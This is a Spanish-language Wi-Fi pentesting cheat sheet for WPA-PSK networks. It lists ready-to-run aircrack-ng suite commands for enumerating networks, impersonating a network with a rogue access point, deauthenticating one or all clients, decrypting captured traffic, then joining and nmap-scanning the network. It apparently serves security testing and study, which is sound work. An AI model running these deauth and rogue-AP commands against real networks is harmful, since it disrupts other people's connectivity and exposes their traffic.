Redes PSK

Redes WPA-TKIP o WPA-CCMP

1. Enumeración

Teniendo en cuenta que la tarjeta de red está en modo MONITOR

  • Para enumerar todas las redes a tu alrededor

airodump-ng -band abg [wlan0mon]  
  • Para limitar la enumeración a un ESSID y guardar el resultado

airodump-ng -band abg [wlan0mon] --esid [ESSID] -w outputFile
  • Para limitar la enumeración a varios ESSIDs y guardar el resultado

airodump-ng --band abg [wlan0mon] --essid-regex 'ESSID1|ESSID2|ESSID3' -w outputFile
  • Para enumerar las redes de canales determinados

airodump-ng -band abg -c [44,60,11] [wlan0mon]
  • Para enumerar los fabricantes de los puntos de acceso

airodump-ng -band abg [wlan0mon] --manufacturer

Teniendo en cuenta que la tarjeta de red está en modo MANAGE

  • Para ver los APs disponibles en el entorno

iwlist [wlan0] scan | grep [ESSID] -i

2. Habilitar Rogue APs de una red

Para suplantar la red necesitamos 2 terminales:

Terminal 1 -> Escanea los AP cercanos con el BSSID a suplantar

airodump-ng --band abg [wlan0mon] --essid [ESSID]

Terminal 2 -> Levanta un AP con el nombre de la red (BSSID) a suplantar con nuestra MAC

airbase-ng -e [ESSID] -v [wlan0mon]

3. Des-autenticar clientes conectados a una red

  • Escaneo de las redes

airodump-ng -c [canal] --essid [ESSID] [wlan0mon]
  • Desautenticación de un cliente de la red

aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] -a [MACDelClienteADesautenticar] [wlan0mon]
  • Desautenticación de todos los cliente de la red

aireplay-ng -0 0 --essid [ESSID] -c [APDeLaRedVictima] [wlan0mon]

4. Descifrar tráfico capturado de una red

airdecap-ng [fichero.cap] -p [password] -e [ESSID]

5. Conexión a la red

Una vez tenemos la contraseña de la red, para autenticarnos podemos generar el fichero "wpa_supplicant_ESSID.conf"

En este fichero necesitamos el hash PSK, que lo generamos con wpa_passphrase

echo "wpa_passphrase [ESSID] [password]" > wpa_supplicant_ESSID.conf

Y obtendremos algo como:

network={
    ssid="MYSSID"
    #psk="passphrase"
    psk=4930a14b99a5884d2bbfa0fe7c3210bf6da8eb5788a0ec69a7507c5f0328a096
}

Con este resultado podremos conectarnos a la red (con la interfaz en modo managed)

wpa_supplicant -c [wpa_supplicant_ESSID.conf] -i [wlan1]

Una vez lanzado este comando, debemos leer los EVENT-SCAN-RESULTS para analizar los posibles fallos en la conexión (CTRL-EVENT-SCAN-FAILED).

Cuanto veamos EVENT-SCAN-CONNECTED habremos conseguido conectarnos a la red.

Una vez conectados debemos solicitar una dirección IP al DHCP.

dhclient [wlan1] -v

6. Recursos accesibles

Cuando tenemos asignada una dirección IP en la red podemos saber el rango que tiene la red, lo que nos permite escanearla en busca de dispositivos conectados.

nmap -Pn IP/rango

En los resultados que obtengamos podemos realizar nmaps que nos den más detalles de los servicios expuestos.

Recursos y enlaces de referencia

Last updated